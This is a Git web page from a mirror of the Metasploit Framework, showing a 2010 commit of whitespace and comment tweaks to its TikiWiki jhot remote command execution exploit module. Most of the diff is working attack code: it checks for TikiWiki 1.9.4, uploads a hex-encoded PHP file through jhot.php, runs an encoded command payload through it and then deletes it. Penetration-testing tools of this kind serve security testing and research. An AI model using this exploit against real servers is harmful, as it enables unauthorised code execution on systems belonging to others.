infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor whitespace tweaks 

git-svn-id: file:///home/svn/framework3/trunk@9108 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-04-19 23:53:27 +00:00
parent dc2b42a8c2
commit 9a5c1ccf68
1 changed files with 20 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -17,11 +21,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'TikiWiki jhot Remote Command Execution',
'Description' => %q{
TikiWiki contains a flaw that may allow a malicious user to execute
arbitrary PHP code. The issue is triggered due to the jhot.php script
not correctly verifying uploaded files. It is possible that the flaw
may allow arbitrary PHP code execution by uploading a malicious PHP
script resulting in a loss of integrity.
The vulnerability has been reported in Tikiwiki version 1.9.4.
arbitrary PHP code. The issue is triggered due to the jhot.php script
not correctly verifying uploaded files. It is possible that the flaw
may allow arbitrary PHP code execution by uploading a malicious PHP
script resulting in a loss of integrity.
The vulnerability was reported in Tikiwiki version 1.9.4.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
@ -43,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
@ -67,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable
end
@ -78,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
create_temp_file()
command = payload.encoded
exe_command(command)
remove_temp_file()
@ -130,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
data =
data =
"-----------------------------7d529a1d23092a\r\n" +
"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
scode +
@ -140,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'uri' => url_jhot,
'method' => 'POST',
'data' => "#{data}",
'data' => data,
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
@ -148,14 +153,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully created temporary file.")
else
print_status("Error creating temporary file.")
end
end
def exe_command(cmd)
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
@ -169,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/my_delim/m))
print_status("The server returned : #{res.code} #{res.message} (#{res.headers['Server']})")
@ -185,7 +190,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("No response from the server")
end
end
def remove_temp_file
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
@ -199,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully remove temporary file.")
else